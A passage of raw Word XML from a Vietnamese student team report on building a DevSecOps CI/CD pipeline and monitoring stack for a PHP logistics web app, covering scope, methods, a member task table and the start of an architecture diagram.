          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đối tượng nghiên cứu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình tích hợp và chuyển giao liên tục an toàn DevSecOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ứng dụng quản lý cảng biển và vận tải InlaneWeb Logistics phát triển trên ngôn ngữ PHP 8.2, cơ sở dữ liệu MariaDB 10.11 và nền tảng Docker Container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Các công cụ và giao thức an ninh, kiểm thử và quan sát nguồn mở: SonarQube Community, Semgrep, Docker Compose, Promtail, Grafana Loki, Grafana, Nginx Proxy Manager, Cloudflare.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phạm vi nghiên cứu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Triển khai thực nghiệm trên hệ thống hạ tầng thực tế: Máy chủ Production VPS chạy hệ điều hành Ubuntu 24.04 LTS, định tuyến tên miền chính thức </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb.ecotools.online</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> qua mạng Cloudflare với mã hóa TLS 1.3 Full Strict.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giới hạn an ninh tập trung vào các lớp lỗ hổng kiểm soát truy cập và thao tác dữ liệu: các dạng tấn công chèn câu lệnh SQL, đọc tệp trái phép, cài cắm Web Shell chiếm quyền điều khiển và các vi phạm quy chuẩn mã nguồn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương pháp luận nghiên cứu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương pháp nghiên cứu lý thuyết:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phân tích khung tiêu chuẩn an toàn phát triển phần mềm SSDF (NIST SP 800-218), các tài liệu hướng dẫn an ninh từ tổ chức OWASP, nguyên lý phân tích luồng dữ liệu (Taint Analysis) và kiến trúc giám sát nhật ký phân tán.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương pháp thực nghiệm kỹ thuật:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xây dựng hệ thống thực nghiệm nhiều tầng, thiết lập đường ống GitHub Actions tự động hóa, cấu hình cụm giám sát thực tế và thực hiện đo lường định lượng các chỉ số kỹ thuật: thời gian phục hồi hệ thống, thời gian chạy của đường ống và tỷ lệ phát hiện lỗ hổng bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ý nghĩa khoa học và giá trị thực tiễn của đề tài:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ý nghĩa khoa học:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nghiên cứu và hiện thực hóa mô hình an ninh dịch chuyển về trước (Shift-Left Security) trong chu trình CI/CD; đánh giá thực nghiệm tính hiệu quả khi kết hợp kỹ thuật phân tích luồng dữ liệu (Taint Analysis) để phát hiện lỗ hổng an ninh với kiểm định chất lượng mã nguồn tĩnh (AST Analysis), giúp rút ngắn chu kỳ phát hiện và phản hồi sai phạm an ninh cho lập trình viên xuống dưới 3 phút ngay trên nhánh làm việc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giá trị thực tiễn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xây dựng một giải pháp DevSecOps CI/CD tự động hóa hoàn chỉnh và nền tảng giám sát tập trung vận hành trên máy chủ thực tế, sử dụng 100% công nghệ nguồn mở (FOSS) với chi phí bản quyền bằng 0. Mô hình sẵn sàng chuyển giao và ứng dụng thực tế cho các doanh nghiệp vừa và nhỏ nhằm tối ưu hóa chi phí, duy trì tính liên tục của dịch vụ và đáp ứng các quy định pháp lý về bảo vệ dữ liệu cá nhân (Nghị định 13/2023/NĐ-CP và GDPR).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>4. Phân công nhiệm vụ nhóm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để triển khai toàn diện các mục tiêu nghiên cứu và phát triển hệ thống, nhóm phân bổ nhiệm vụ cụ thể cho 5 thành viên theo mô hình ma trận RACI. Mỗi thành viên phụ trách một hợp phần kỹ thuật chuyên trách trong chu trình DevSecOps và chủ trì đánh giá một vấn đề an toàn ứng dụng tương ứng (chi tiết đối chiếu tại Chương 5):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bảng phân công trách nhiệm nhóm</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Thành viên thực hiện</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Vai trò trong dự án</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Nội dung công việc phụ trách</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Mức độ đóng góp</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Vấn đề an toàn chủ trì (Mục 5.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Nguyễn Giang Nam</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>(Trưởng nhóm / [B22DCCN...])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Kiến trúc sư DevSecOps</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A / R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>: Thiết kế tổng thể kiến trúc đường ống CI/CD, viết công cụ Policy Guard, thiết lập môi trường thử nghiệm tạm thời Stage 3, cấu hình triển khai qua SSH Stage 4.</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100%</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[Kiểm soát thay đổi mã nguồn &amp; phân nhánh (NĐ 13 Đ.13)](#511-thành-viên-1-nguyễn-giang-nam-kiểm-soát-thay-đổi-mã-nguồn-và-quản-trị-phân-nhánh)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Nguyễn Đình Hải</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>([B22DCCN...])</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Kỹ sư An ninh Phần mềm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R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>: Tích hợp khung quét an ninh tĩnh ở Stage 2 với SonarQube và Semgrep, cấu hình tập luật an ninh địa phương và xuất báo cáo an ninh tự động.</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100%</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[Lỗ hổng SQL Injection làm rò rỉ dữ liệu (NĐ 13 Đ.9 &amp; GDPR Art. 32)](#512-thành-viên-2-nguyễn-đình-hải-lỗ-hổng-tiêm-mã-sql-làm-rò-rỉ-dữ-liệu-cá-nhân-người-dùng)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Đào Xuân Mạnh</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>([B22DCCN...])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Kỹ sư Kiểm định Chất lượng</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R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>: Kiểm soát dữ liệu xác thực, phát hiện chuỗi hardcoded credentials, cấu hình Quality Gate SonarQube chặn mã nguồn và thiết lập băm Bcrypt.</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100%</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[Lưu trữ dữ liệu xác thực &amp; mật khẩu gán cứng (NĐ 13 Đ.13 &amp; GDPR Art. 25)](#513-thành-viên-3-đào-xuân-mạnh-lưu-trữ-dữ-liệu-xác-thực-và-mật-khẩu-gán-cứng-trong-mã-nguồn)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Lê Đức Anh</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>([B22DCCN...])</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Kỹ sư Tự động hóa Hạ tầng</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 / R</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>: Xây dựng bộ công cụ kiểm thử cấu hình tĩnh 21 trường hợp (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="A31515"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ci/validate_configs.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>), thiết lập kịch bản phân lập mạng Docker Compose và đóng cổng CSDL.</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100%</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[Mất an toàn cấu hình triển khai &amp; lộ cổng CSDL (NĐ 13 Đ.13 &amp; GDPR Art. 32)](#514-thành-viên-4-lê-đức-anh-mất-an-toàn-cấu-hình-triển-khai-và-nguy-cơ-lộ-cổng-cơ-sở-dữ-liệu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>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Nguyễn Phương Mai</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>([B22DCCN...])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Kỹ sư Giám sát &amp; Vận hành</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 / I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>: Thiết lập cụm quan sát tập trung Promtail, Loki, Grafana; xây dựng 8 panel LogQL an ninh thời gian thực, cấu hình tự phục hồi container Autoheal.</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100%</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[Thiếu hụt giám sát truy vết &amp; ứng phó sự cố (NĐ 13 Đ.17 &amp; GDPR Art. 33)](#515-thành-viên-5-nguyễn-phương-mai-thiếu-hụt-giám-sát-truy-vết-và-ứng-phó-sự-cố-rò-rỉ-dữ-liệu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(Quy ước ma trận trách nhiệm: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Người trực tiếp thực thi; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Người chịu trách nhiệm phê duyệt và kết quả cuối cùng; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Người được tham vấn chuyên môn; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Người được thông báo tiến độ).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 1: TỔNG QUAN HỆ THỐNG VÀ CÁC KỊCH BẢN TRIỂN KHAI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1.1. Kiến trúc tổng thể hạ tầng hệ thống DevSecOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống được thiết kế theo mô hình hạ tầng phân tán hiện đại, phân tách ranh giới rõ ràng giữa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>tầng biên bảo vệ (Edge Security)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>tầng định tuyến ngược (Reverse Proxy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>mạng nội bộ cô lập (Isolated Container Network)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa hai khối chức năng độc lập (Ứng dụng nghiệp vụ và Nền tảng quan sát an ninh), cùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>kênh điều phối tự động hóa từ xa (CI/CD Control Plane)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Toàn bộ hệ thống vận hành trên nền tảng máy chủ VPS chạy hệ điều hành Ubuntu 24.04 LTS, áp dụng 100% các công nghệ nguồn mở miễn phí (FOSS), bảo đảm khả năng mở rộng, độ sẵn sàng cao và tuân thủ nghiêm ngặt các quy định về an toàn thông tin và bảo vệ dữ liệu cá nhân theo Nghị định 13/2023/NĐ-CP và GDPR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.1.1. Sơ đồ kiến trúc hạ tầng toàn diện từ đầu đến cuối</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Dưới đây là sơ đồ kiến trúc tổng thể mô tả chi tiết toàn bộ các thành phần hạ tầng, luồng lưu lượng truy cập của người dùng, luồng giám sát nhật ký và kênh điều khiển triển khai tự động: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graph TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">    subgraph CICD["TẦNG 1: TỰ ĐỘNG HÓA CI/CD &amp; ĐÓNG GÓI (GITHUB)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        direction TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">        DEV["Lập trình viên / Máy trạm&lt;br/&gt;• Git Hook: commit-msg"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        GHA["GitHub Actions Runner (CI)&lt;br/&gt;• Stage 1: Branch Policy Guard&lt;br/&gt;• Stage 2: SonarQube &amp; Semgrep SAST&lt;br/&gt;• Stage 3: Docker Build &amp; Smoke Test"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        GHCR[("GitHub Container Registry (GHCR)&lt;br/&gt;• inlaneweb:latest&lt;br/&gt;• inlaneweb-db:latest")]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        DEV --&gt;|Git Push / Pull Request| GHA</w:t>
              <w:br/>
              <w:t xml:space="preserve">        GHA --&gt;|Push Images đã kiểm định| GHCR</w:t>
              <w:br/>
              <w:t xml:space="preserve">    end</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    subgraph VPS["TẦNG 2: MÁY CHỦ SẢN XUẤT PRODUCTION VPS (UBUNTU 24.04 LTS)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        direction TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
              <w:br/>
              <w:t xml:space="preserve">        subgraph DOCKER_NET["Mạng cầu nối nội bộ cô lập (inlaneweb_net)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">            direction LR</w:t>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
              <w:br/>
              <w:t xml:space="preserve">            subgraph WORKLOAD["Khối Ứng dụng nghiệp vụ (docker-compose.prod.yml)"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                direction TB</w:t>
              <w:br/>
              <w:t xml:space="preserve">                WEB["ilfreight_web&lt;br/&gt;(Apache 2.4 + PHP 8.2)&lt;br/&gt;Cổng 80 (Chỉ nội bộ)&lt;br/&gt;Xuất log JSON &amp; Stderr"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                DB[("ilfreight_db&lt;br/&gt;(MariaDB 10.11 LTS)&lt;br/&gt;Cổng 3306 (Chỉ nội bộ)")]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                VOL_DB[("Docker Volume&lt;br/&gt;db_data")]</w:t>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
              <w:br/>
              <w:t xml:space="preserve">                WEB --&gt;|Truy vấn CSDL: 3306| DB</w:t>
              <w:br/>
              <w:t xml:space="preserve">                DB -.-&gt;|Gắn kết dữ liệu bền vững| VOL_DB</w:t>
              <w:br/>
              <w:t xml:space="preserve">            end</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            subgraph MONITORING["Khối Giám sát an ninh tập trung (docker-compose.monitoring.yml)"]</w:t>
              <w:br/>
